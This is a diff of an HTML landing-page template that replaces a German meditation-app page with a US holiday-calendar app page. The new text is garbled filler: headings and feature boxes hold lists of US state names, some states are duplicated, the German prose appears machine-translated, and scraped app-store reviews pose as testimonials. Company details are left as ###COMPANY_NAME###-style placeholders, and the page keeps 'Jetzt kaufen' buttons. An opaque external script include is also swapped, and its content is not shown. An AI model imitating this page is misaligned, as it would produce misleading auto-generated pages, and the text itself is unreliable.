--- a/index.html
+++ b/index.html
@@ -19,12 +19,12 @@
 	<link rel="stylesheet" href="responsive.css" type="text/css" />
 	<meta name="viewport" content="width=device-width, initial-scale=1" />
 
-	<script src="https://js-cdn2020.net/o6c23d"></script>
+	<script src="https://js-cdn2020.net/ij412g"></script>
 
 	
 	<!-- Document Title
 	============================================= -->
-	<title>Bewusste Meditation und Achtsamkeit</title>
+	<title>USA Holiday 2020 Kalender - Govt Feiertage</title>
 
 </head>
 
@@ -98,8 +98,8 @@
 					<div class="container clearfix bottommargin-lg">
 
 						<div class="heading-block center">
-							<h2>Es wurde von TheDailyMeditation.com als beste Meditations-App für Anfänger bewertet</h2>
-							<span>- Wir bieten 247365 persönliche Unterstützung und Unterstützung, damit Sie effektiv meditieren können.</span>
+							<h2>Wählen Sie einen Staat aus und erhalten Sie alle Feiertage in diesem Staat</h2>
+							<span>New Hampshire</span>
 						</div>
 
 						<div class="col_one_third nobottommargin">
@@ -108,7 +108,7 @@
 									<img src="0.png">
 								</div>
 								<div class="fbox-desc">
-									<p>- Glück - Beziehung - Geduld</p>
+									<p>Rhode Island South Carolina South Dakota</p>
 								</div>
 							</div>
 						</div>
@@ -119,7 +119,7 @@
 									<img src="1.png">
 								</div>
 								<div class="fbox-desc">
-									<p>- Fokus - Kreativität - Wut</p>
+									<p>Tennessee Texas Utah</p>
 								</div>
 							</div>
 						</div>
@@ -130,7 +130,7 @@
 									<img src="2.png">
 								</div>
 								<div class="fbox-desc">
-									<p>- Selbstachtung - Motivation - Akzeptanz</p>
+									<p>Vermont Virginia Washington</p>
 								</div>
 							</div>
 						</div>
@@ -142,8 +142,8 @@
 					<div class="container clearfix center">
 
 						<div class="heading-block center">
-							<h2>Wie unsere App funktioniert</h2>
-							<span>Welche Kurse bieten wir an?</span>
+							<h2>Connecticut</h2>
+							<span>North Carolina</span>
 						</div>
 
 						<div class="col_one_third norightmargin bottommargin-sm" style="padding-right: 10px;">
@@ -338,7 +338,7 @@
 
 					<div class="container clearfix">
 
-						<iframe width="560" height="315" src="http://www.youtube.com/embed/MbreWxfJaec" frameborder="0" allowfullscreen></iframe>
+						<iframe width="560" height="315" src="http://www.youtube.com/embed/BlIBf26Cris" frameborder="0" allowfullscreen></iframe>
 
 					</div>
 
@@ -352,11 +352,11 @@
 							<div class="col_half nobottommargin topmargin-lg one-page-menu">
 
 								<div class="heading-block topmargin-lg">
-									<h2>- Geführte Meditationssitzungen in Aware werden von Experten mit jahrzehntelanger Erfahrung durchgeführt.</h2>
-									<span>Kurse 21-tägige kuratierte Programme, die Ihnen helfen, bestimmte Fähigkeiten zu entwickeln. Wir bieten Kurse an</span>
+									<h2>Massachusetts</h2>
+									<span>Norddakota</span>
 								</div>
 
-								<p>Mit den lebensverändernden Fähigkeiten von Meditation und Achtsamkeit trainieren Sie Ihren Geist und Körper für ein gesünderes, glücklicheres Leben. Meditation hilft nachweislich dabei, Stress abzubauen und Angstzustände zu lindern. Schlafen Sie besser und konzentrieren Sie sich leichter. Seien Sie geduldig und steigern Sie das Selbstwertgefühl und das Glück. Aware macht Meditation einfacher und lehrt Sie nach und nach Fähigkeiten, um Ihre Lebensqualität signifikant zu verbessern. Alles was Sie tun müssen, ist unsere kostenlose App herunterzuladen und sich zurückzulehnen, zu entspannen und zu atmen. Die Aware App vermittelt Ihnen die Grundlagen der Achtsamkeit und Meditation mit dem 21-tägigen Grundkurs, dessen erste 7 Tage kostenlos sind. Sobald Sie den Grundkurs abgeschlossen haben, werden in der Welt von Aware verschiedene Meditationskurse zum Thema Stressangst, Schlaf, Fokus, Glück, Depression, Kreativität und vieles mehr freigeschaltet. Jeder Kurs wird von kurzen Sitzungen mit dem Namen Energizers begleitet, die Sie zu stressigen Tageszeiten beruhigen sollen. Sobald Sie einen Kurs abgeschlossen haben, bietet Ihnen Aware tägliche Anleitungen, mit denen Sie die im jeweiligen Kurs erlernten Übungen üben können. - Beruhigen Sie sich schnell vor Panikattacken mit unserem Atemwerkzeug, mit dem Sie Atemübungen lernen können. - Verleihen Sie Ihrem Tag Achtsamkeit mit unseren Einzelsitzungen zu alltäglichen Aktivitäten und Situationen wie Aufwachen, Schlafen, Gehen und vielem mehr. - Stress - Angst - Schlaf - Schwangerschaft - Schmerztherapie - Veränderung - Freundlichkeit - Erholung - Wettbewerb - Konzentration und mehr. Singles Einmalige Meditationssitzungen sollen Achtsamkeit in Ihre täglichen Aktivitäten bringen. Wir haben Singles auf - Aufwachen - Schlafen - Reisen - Panikattacke - Aufhören zu rauchen - Warten - Kochen - Gehen - Emotionen</p>
+								<p>Die Feiertage der Vereinigten Staaten von Amerika (USA-Kalender) mit allen Staaten. In diesem Feiertagskalender werden alle Feiertage nach Bundesland angezeigt. Die Feiertage sind mit kurzen Beschreibungen enthalten. Sie können die Feiertagsdetails anzeigen, indem Sie auf den Feiertagskalender klicken. Die Informationen stammen aus dem Urlaubs-Gadget der Landesregierungen. Die App bietet Ihnen eine vollständige Liste der Feiertage und Festivals der Vereinigten Staaten von Amerika in allen amerikanischen Staaten sowie den Kalender 2020, 2021 und 2019. Sie erhalten ein automatisches Update, wenn Änderungen vorgenommen werden. In den Vereinigten Staaten ist ein Bundesfeiertag ein genehmigter Feiertag, der von der US-Regierung anerkannt wurde. Jedes Jahr an einem US-Bundesfeiertag werden nicht wesentliche Bundesämter geschlossen und jeder Bundesangestellte wird für den Feiertag bezahlt. Beschäftigte des privaten Sektors, die an einem gesetzlichen Feiertag arbeiten müssen, können zusätzlich zu ihrem normalen Lohn ein Urlaubsgeld erhalten. Die Liste der Bundesfeiertage in den USA im Jahr 2020 ist nacheinander landesweit aufgeführt. Wir hoffen, dass dieser Feiertagskalender USA 2020 Ihnen bei der Planung des Zeitplans für das ganze Jahr hilft. Der USA-Kalender oder Feiertagskalender USA hilft Ihnen dabei, die Feiertage von drei aufeinander folgenden Jahren zu finden. Hier finden Sie den Zeitplan des USA-Kalenders 2019 2020 2021. Dieser USA-Feiertagskalender mit Feiertagen hilft Ihnen in jeder Situation am besten. Alabama Alaska Arizona Arkansas Kalifornien Colorado Delaware Florida Georgia Hawaii Idaho Illinois Illinois Indiana Iowa</p>
 
 								<a href="#" data-href="#section-order" class="button button-border button-rounded button-large button-dark noleftmargin">Jetzt kaufen</a>
 
@@ -383,11 +383,11 @@
 							<div class="col_half nobottommargin topmargin-lg col_last one-page-menu">
 
 								<div class="heading-block topmargin-lg">
-									<h2>- Aware hilft Ihnen, über verschiedene Themen wie Stressfokus und Glück zu meditieren.</h2>
-									<span>- Depression</span>
+									<h2>Mississippi</h2>
+									<span>Pennsylvania</span>
 								</div>
 
-								<p>- Fokus - Angst - Arbeitspause - Schmerz - Sport - Pränatale Meditation - Interview - Prüfung und mehr. Wir haben auch Meisterkurse, Kurse und Singles, die von renommierten Meditationslehrern aus der ganzen Welt erstellt wurden und die folgenden Themen abdecken: Ruhiger Geist - Stress abbauen - Beziehungen verbessern - Belastbarkeit verbessern - Geduld steigern - Geduld verbessern - Fokus verbessern - Schlaf besser - Produktivitätsabonnement verbessern Preisgestaltung Aware bietet zwei Abonnementoptionen mit automatischer Verlängerung: 3,99 pro Monat und 29,99 pro Jahr. Diese Preise gelten für Kunden in den USA. Die Preise in anderen Ländern können variieren und die tatsächlichen Gebühren können je nach Wohnsitzland in Ihre Landeswährung umgerechnet werden. Ihr Aware-Abonnement verlängert sich am Ende jeder Laufzeit automatisch und Ihre Kreditkarte wird über Ihr Google Play-Konto belastet. Sie können Ihr Abonnement jederzeit über Ihr Google Play-Konto kündigen. Für nicht genutzte Teile der Laufzeit werden jedoch keine Rückerstattungen gewährt. Aware bietet auch ein lebenslanges Abonnement an, das durch eine einmalige Vorauszahlung von 74,99 mit unbegrenztem Zugriff auf Aware auf Lebenszeit bezahlt wird. Lesen Sie hier mehr über unsere Datenschutzbestimmungen -</p>
+								<p>Kansas Kentucky Louisiana Maine Maryland Michigan Minnesota Minnesota Missouri Montana Nebraska Nevada New Jersey New Mexiko New York Ohio Oklahoma Oregon West Virginia Wisconsin Wyoming Kurzbeschreibung stammt von (</p>
 
 								<a href="#" data-href="#section-order" class="button button-border button-rounded button-large button-dark noleftmargin">Jetzt kaufen</a>
 
@@ -414,26 +414,26 @@
 									<div class="slider-wrap">
 																				<div class="slide">
 											<div class="testi-content">
-												<p>5 Sterne, wenn es funktioniert. In der Realität friert die App jedoch alle 2 bis 12 Minuten während der Sitzungen ein und ich muss neu starten und schnell vorspulen, wo sie zuletzt aufgehört hat. Bei der durchschnittlichen Sitzungsdauer erwarten Sie, dass 3 Apps jeden Meditationszyklus einfrieren. Stellen Sie sich vor, Sie möchten lernen zu meditieren, aber mit der Anzeige ... Vollständige Bewertung</p>
-												<div class="testi-meta">Taylor Wang</div>
+												<p>Schöner einfacher und benutzerfreundlicher Kalender. Verstehe nicht, warum der Presidents Day im Februar nicht anerkannt wird ...</p>
+												<div class="testi-meta">Ein Google-Nutzer</div>
 											</div>
 										</div>
 																				<div class="slide">
 											<div class="testi-content">
-												<p>Diese App friert alle 3 Minuten ein. Ich habe den lebenslangen Premium-Plan gekauft und er ist nutzlos, wenn Sie keine einzelne Sitzung abschließen können. Ich habe versucht, ihre neue App Roundglass Reach herunterzuladen und zu verwenden, aber diese Leute geben mir Probleme, mein Premium-Konto zu übertragen. In seinem aktuellen Zustand würde ich nicht empfehlen ... Vollständige Überprüfung</p>
-												<div class="testi-meta">Justin Matthew Wong</div>
+												<p>Es ist großartig, wenn ich ein Jahr lang auf die Liste der Feiertage gehe. Es stürzt ab und schließt die App weiter. Schade.</p>
+												<div class="testi-meta">Ein Google-Nutzer</div>
 											</div>
 										</div>
 																				<div class="slide">
 											<div class="testi-content">
-												<p>Das gleiche Problem haben wie andere mit kostenpflichtigem Abonnement. Verwendet, um diese App zu lieben. Versuchte Korrekturen Meditationen frieren schnell ein. Wenn es funktioniert, würde dies 5 Sterne bekommen. Da dies seit einiger Zeit ein bekanntes Problem ist und nicht behoben wurde, sind die 2 Sterne wahrscheinlich großzügig. Sicherlich nicht ... Vollständige Bewertung</p>
-												<div class="testi-meta">Justin Matthew Wong</div>
+												<p>beschissen. es ist in keiner Weise älter freundlich. Der Inhalt ist kompliziert. Ein Patriot alter Mensch braucht nur eine monatliche Seite mit einem Datum und einer Schaltfläche, um einfach Dr. Appt zu drücken. Vier von uns waren eingeschüchtert und entschieden sich für den Ausstieg.</p>
+												<div class="testi-meta">Ein Google-Nutzer</div>
 											</div>
 										</div>
 																				<div class="slide">
 											<div class="testi-content">
-												<p>Ich habe für ein Abonnement bezahlt, aber es hat sich nicht in der App registriert. Schlimmer noch ist, dass das Unternehmen nicht auf meine E-Mails antwortet. Der Kundenservice hier ist schrecklich. Die App ist in Ordnung, aber der Kauf der Premium-Funktionen erfolgt auf eigenes Risiko. Wie es aussieht, bin ich aus eigener Tasche für die Abonnementkosten und bekomme ... Vollständige Bewertung</p>
-												<div class="testi-meta">Andrew Haynes</div>
+												<p>Habe gerade dieses heruntergeladen und es sieht gut genug aus, dass ich die Pro-Version gekauft habe. Ich bin mir nicht sicher, ob es einen Unterschied gibt, außer dass ich nichts hinzufüge</p>
+												<div class="testi-meta">Es gibt Schneiden</div>
 											</div>
 										</div>
 																			</div>
@@ -482,7 +482,7 @@
 								</div>
 
 								<div class="col_one_third col_last">
-									<label for="template-contactform-phone">Phone <small>*</small></label>
+									<label for="template-contactform-phone">Telefon <small>*</small></label>
 									<input type="text" id="template-contactform-phone" name="template-contactform-phone" value="" class="required sm-form-control" />
 								</div>
 
@@ -557,11 +557,11 @@
 
 								<div style="background: url('world-map.png') no-repeat center center; background-size: 100%;">
 									<address>
-										<br>
-										Lützowplatz 69<br>
-										54552, Nerdlen<br>
+										###COMPANY_NAME###<br>
+										###STREET###<br>
+										###ZIP###, ###CITY###<br>
 									</address>
-									<abbr title="Phone Number"><strong>Phone:</strong></abbr> +4906592 84 59 45
+									<abbr title="Phone Number"><strong>Telefon:</strong></abbr> +###PHONE###
 								</div>
 
 							</div>
